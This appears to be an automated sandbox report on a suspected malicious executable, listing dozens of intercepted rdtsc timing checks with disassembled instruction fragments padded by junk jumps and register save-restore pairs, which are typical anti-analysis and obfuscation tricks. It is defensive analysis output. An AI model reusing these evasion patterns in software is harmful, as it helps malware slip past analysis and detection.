Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730CA3 second address: 7730CC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA002Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+08h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F9334BA0030h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730CC9 second address: 7730CCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730CCF second address: 7730D2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F9334BA002Ch 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007F9334BA002Bh 0x0000000f or ecx, 73A973EEh 0x00000015 jmp 00007F9334BA0039h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e lea eax, dword ptr [ebx+70h] 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F9334BA0038h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730D2D second address: 7730D33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730D33 second address: 7730D7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, al 0x00000005 movsx edi, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 00000001h 0x0000000d pushad 0x0000000e call 00007F9334BA002Eh 0x00000013 mov dx, cx 0x00000016 pop esi 0x00000017 mov eax, ebx 0x00000019 popad 0x0000001a push ebp 0x0000001b pushad 0x0000001c movzx esi, bx 0x0000001f mov edi, 45472ED4h 0x00000024 popad 0x00000025 mov dword ptr [esp], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F9334BA0036h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730D7C second address: 7730DCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF99Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-18h] 0x0000000c jmp 00007F9334DAF9A6h 0x00000011 nop 0x00000012 jmp 00007F9334DAF9A0h 0x00000017 push eax 0x00000018 pushad 0x00000019 mov si, bx 0x0000001c movsx edi, ax 0x0000001f popad 0x00000020 nop 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F9334DAF99Bh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730E0B second address: 7730E11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730E11 second address: 7730E17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730E17 second address: 7730E1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730E1B second address: 7730EF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a pushad 0x0000000b jmp 00007F9334DAF9A2h 0x00000010 movzx eax, di 0x00000013 popad 0x00000014 test edi, edi 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F9334DAF9A3h 0x0000001d jmp 00007F9334DAF9A3h 0x00000022 popfd 0x00000023 mov dh, al 0x00000025 popad 0x00000026 js 00007F93A44AE1DBh 0x0000002c jmp 00007F9334DAF99Bh 0x00000031 mov eax, dword ptr [ebp-14h] 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007F9334DAF9A4h 0x0000003b sub cx, 0E58h 0x00000040 jmp 00007F9334DAF99Bh 0x00000045 popfd 0x00000046 mov bx, ax 0x00000049 popad 0x0000004a mov ecx, esi 0x0000004c pushad 0x0000004d pushfd 0x0000004e jmp 00007F9334DAF9A0h 0x00000053 or si, 98B8h 0x00000058 jmp 00007F9334DAF99Bh 0x0000005d popfd 0x0000005e mov bx, ax 0x00000061 popad 0x00000062 mov dword ptr [esi+0Ch], eax 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 jmp 00007F9334DAF9A7h 0x0000006d mov ax, 1ACFh 0x00000071 popad 0x00000072 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730EF4 second address: 7730FAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9334BA002Bh 0x00000009 and si, CFDEh 0x0000000e jmp 00007F9334BA0039h 0x00000013 popfd 0x00000014 call 00007F9334BA0030h 0x00000019 pop ecx 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov edx, 76EB06ECh 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F9334BA0037h 0x00000029 jmp 00007F9334BA0033h 0x0000002e popfd 0x0000002f mov bx, si 0x00000032 popad 0x00000033 sub eax, eax 0x00000035 jmp 00007F9334BA002Bh 0x0000003a lock cmpxchg dword ptr [edx], ecx 0x0000003e jmp 00007F9334BA0036h 0x00000043 pop edi 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F9334BA0037h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730FAD second address: 7730FB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730FB3 second address: 7730FE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F9334BA002Dh 0x00000011 sub cl, FFFFFF96h 0x00000014 jmp 00007F9334BA0031h 0x00000019 popfd 0x0000001a push eax 0x0000001b push edx 0x0000001c mov ecx, 1E32C75Dh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730FE8 second address: 7731075 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 2AD97C59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a jne 00007F93A44AE080h 0x00000010 jmp 00007F9334DAF9A4h 0x00000015 mov edx, dword ptr [ebp+08h] 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F9334DAF99Eh 0x0000001f add eax, 0BA66618h 0x00000025 jmp 00007F9334DAF99Bh 0x0000002a popfd 0x0000002b pushfd 0x0000002c jmp 00007F9334DAF9A8h 0x00000031 and si, D078h 0x00000036 jmp 00007F9334DAF99Bh 0x0000003b popfd 0x0000003c popad 0x0000003d mov eax, dword ptr [esi] 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F9334DAF9A5h 0x00000046 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7731075 second address: 773107A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 773107A second address: 77310C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F9334DAF99Dh 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [edx], eax 0x0000000f jmp 00007F9334DAF9A7h 0x00000014 mov eax, dword ptr [esi+04h] 0x00000017 pushad 0x00000018 mov bx, cx 0x0000001b mov ebx, ecx 0x0000001d popad 0x0000001e mov dword ptr [edx+04h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov edi, 32D1690Ah 0x00000029 pushad 0x0000002a popad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77310C0 second address: 77310D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9334BA002Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77310D1 second address: 77310F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+08h] 0x0000000b pushad 0x0000000c movsx edx, ax 0x0000000f mov ebx, ecx 0x00000011 popad 0x00000012 mov dword ptr [edx+08h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F9334DAF99Dh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77310F5 second address: 7731116 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 mov di, 75BEh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esi+0Ch] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F9334BA0030h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7731116 second address: 7731145 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF99Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+0Ch], eax 0x0000000c jmp 00007F9334DAF9A6h 0x00000011 mov eax, dword ptr [esi+10h] 0x00000014 pushad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7731145 second address: 77311F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F9334BA002Ah 0x0000000a add si, F918h 0x0000000f jmp 00007F9334BA002Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F9334BA0036h 0x0000001d and esi, 301AE378h 0x00000023 jmp 00007F9334BA002Bh 0x00000028 popfd 0x00000029 pushfd 0x0000002a jmp 00007F9334BA0038h 0x0000002f and si, 7DD8h 0x00000034 jmp 00007F9334BA002Bh 0x00000039 popfd 0x0000003a popad 0x0000003b popad 0x0000003c mov dword ptr [edx+10h], eax 0x0000003f jmp 00007F9334BA0036h 0x00000044 mov eax, dword ptr [esi+14h] 0x00000047 jmp 00007F9334BA0030h 0x0000004c mov dword ptr [edx+14h], eax 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F9334BA002Ah 0x00000058 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77311F9 second address: 77311FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77311FD second address: 7731203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7731203 second address: 773128D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9334DAF99Ch 0x00000009 sbb ecx, 49D601C8h 0x0000000f jmp 00007F9334DAF99Bh 0x00000014 popfd 0x00000015 call 00007F9334DAF9A8h 0x0000001a pop eax 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov eax, dword ptr [esi+18h] 0x00000021 jmp 00007F9334DAF9A1h 0x00000026 mov dword ptr [edx+18h], eax 0x00000029 pushad 0x0000002a pushad 0x0000002b call 00007F9334DAF99Ah 0x00000030 pop eax 0x00000031 mov dh, C4h 0x00000033 popad 0x00000034 pushfd 0x00000035 jmp 00007F9334DAF99Ch 0x0000003a or al, FFFFFFB8h 0x0000003d jmp 00007F9334DAF99Bh 0x00000042 popfd 0x00000043 popad 0x00000044 mov eax, dword ptr [esi+1Ch] 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 773128D second address: 77312BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F9334BA0031h 0x0000000a adc eax, 4F02FC56h 0x00000010 jmp 00007F9334BA0031h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77312BC second address: 773138E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 movzx eax, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [edx+1Ch], eax 0x0000000f jmp 00007F9334DAF99Bh 0x00000014 mov eax, dword ptr [esi+20h] 0x00000017 jmp 00007F9334DAF9A6h 0x0000001c mov dword ptr [edx+20h], eax 0x0000001f pushad 0x00000020 movzx eax, bx 0x00000023 mov ecx, edx 0x00000025 popad 0x00000026 mov eax, dword ptr [esi+24h] 0x00000029 jmp 00007F9334DAF9A5h 0x0000002e mov dword ptr [edx+24h], eax 0x00000031 pushad 0x00000032 mov ax, D313h 0x00000036 call 00007F9334DAF9A8h 0x0000003b push ecx 0x0000003c pop ebx 0x0000003d pop ecx 0x0000003e popad 0x0000003f mov eax, dword ptr [esi+28h] 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 pushfd 0x00000046 jmp 00007F9334DAF9A6h 0x0000004b adc cx, 7FF8h 0x00000050 jmp 00007F9334DAF99Bh 0x00000055 popfd 0x00000056 pushfd 0x00000057 jmp 00007F9334DAF9A8h 0x0000005c xor si, 5A58h 0x00000061 jmp 00007F9334DAF99Bh 0x00000066 popfd 0x00000067 popad 0x00000068 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 773138E second address: 77313D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 4BC2D57Ah 0x00000008 pushfd 0x00000009 jmp 00007F9334BA002Bh 0x0000000e add cl, 0000001Eh 0x00000011 jmp 00007F9334BA0039h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [edx+28h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F9334BA002Dh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77313D4 second address: 77313E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9334DAF99Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77313E4 second address: 77313E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77313E8 second address: 77313F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [esi+2Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77313F9 second address: 7731411 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA0034h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7731411 second address: 7731417 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7731417 second address: 773141B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 773141B second address: 773141F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 773141F second address: 773149A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+2Ch], ecx 0x0000000b pushad 0x0000000c mov esi, ebx 0x0000000e mov dh, 3Ah 0x00000010 popad 0x00000011 mov ax, word ptr [esi+30h] 0x00000015 jmp 00007F9334BA002Ah 0x0000001a mov word ptr [edx+30h], ax 0x0000001e jmp 00007F9334BA0030h 0x00000023 mov ax, word ptr [esi+32h] 0x00000027 jmp 00007F9334BA0030h 0x0000002c mov word ptr [edx+32h], ax 0x00000030 jmp 00007F9334BA0030h 0x00000035 mov eax, dword ptr [esi+34h] 0x00000038 pushad 0x00000039 mov ecx, 1D4DC32Dh 0x0000003e call 00007F9334BA002Ah 0x00000043 mov ah, 90h 0x00000045 pop ebx 0x00000046 popad 0x00000047 mov dword ptr [edx+34h], eax 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 773149A second address: 77314A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF99Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77314A9 second address: 77314AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77314AF second address: 77314B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77314B3 second address: 7731519 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test ecx, 00000700h 0x0000000e pushad 0x0000000f jmp 00007F9334BA002Dh 0x00000014 push ecx 0x00000015 pushfd 0x00000016 jmp 00007F9334BA0037h 0x0000001b and eax, 220CEC1Eh 0x00000021 jmp 00007F9334BA0039h 0x00000026 popfd 0x00000027 pop esi 0x00000028 popad 0x00000029 jne 00007F93A429E233h 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 push eax 0x00000033 pop ebx 0x00000034 movzx esi, dx 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7731519 second address: 773152A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9334DAF99Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 773152A second address: 773154D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or dword ptr [edx+38h], FFFFFFFFh 0x0000000c jmp 00007F9334BA002Dh 0x00000011 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 773154D second address: 7731551 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7731551 second address: 7731557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7731557 second address: 773155D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 773155D second address: 7731561 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7731561 second address: 77315A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or dword ptr [edx+40h], FFFFFFFFh 0x0000000c jmp 00007F9334DAF9A8h 0x00000011 pop esi 0x00000012 pushad 0x00000013 mov al, 46h 0x00000015 movsx edx, ax 0x00000018 popad 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F9334DAF9A1h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77315A1 second address: 77315B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9334BA002Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77315B1 second address: 77315B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77315B5 second address: 77315CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9334BA002Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7720692 second address: 7720708 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF99Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F9334DAF9A4h 0x00000011 sbb ch, 00000038h 0x00000014 jmp 00007F9334DAF99Bh 0x00000019 popfd 0x0000001a mov dl, al 0x0000001c popad 0x0000001d push eax 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F9334DAF9A0h 0x00000025 sub esi, 474D4698h 0x0000002b jmp 00007F9334DAF99Bh 0x00000030 popfd 0x00000031 push eax 0x00000032 push edx 0x00000033 call 00007F9334DAF9A6h 0x00000038 pop esi 0x00000039 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76C0008 second address: 76C000E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76C000E second address: 76C009C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9334DAF9A7h 0x00000009 add cx, 634Eh 0x0000000e jmp 00007F9334DAF9A9h 0x00000013 popfd 0x00000014 mov ebx, ecx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a jmp 00007F9334DAF99Ah 0x0000001f push eax 0x00000020 jmp 00007F9334DAF99Bh 0x00000025 xchg eax, ebp 0x00000026 jmp 00007F9334DAF9A6h 0x0000002b mov ebp, esp 0x0000002d jmp 00007F9334DAF9A0h 0x00000032 pop ebp 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F9334DAF99Ah 0x0000003c rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76C009C second address: 76C00A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76C00A0 second address: 76C00A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76C075D second address: 76C076C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA002Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76C076C second address: 76C07E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9334DAF99Fh 0x00000009 add si, BDFEh 0x0000000e jmp 00007F9334DAF9A9h 0x00000013 popfd 0x00000014 jmp 00007F9334DAF9A0h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e jmp 00007F9334DAF99Eh 0x00000023 push eax 0x00000024 push edx 0x00000025 pushfd 0x00000026 jmp 00007F9334DAF9A0h 0x0000002b adc eax, 143C3F58h 0x00000031 jmp 00007F9334DAF99Bh 0x00000036 popfd 0x00000037 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76C07E6 second address: 76C0840 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F9334BA0038h 0x00000008 or esi, 754A49B8h 0x0000000e jmp 00007F9334BA002Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 push eax 0x00000018 jmp 00007F9334BA0039h 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F9334BA002Dh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76C0840 second address: 76C0850 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9334DAF99Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76C0850 second address: 76C0866 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA002Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76C0D7B second address: 76C0D9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF9A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9334DAF99Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76C0D9F second address: 76C0DB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9334BA002Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76C0DB1 second address: 76C0DB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 76C0DB5 second address: 76C0DCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9334BA002Ah 0x00000010 rdtsc
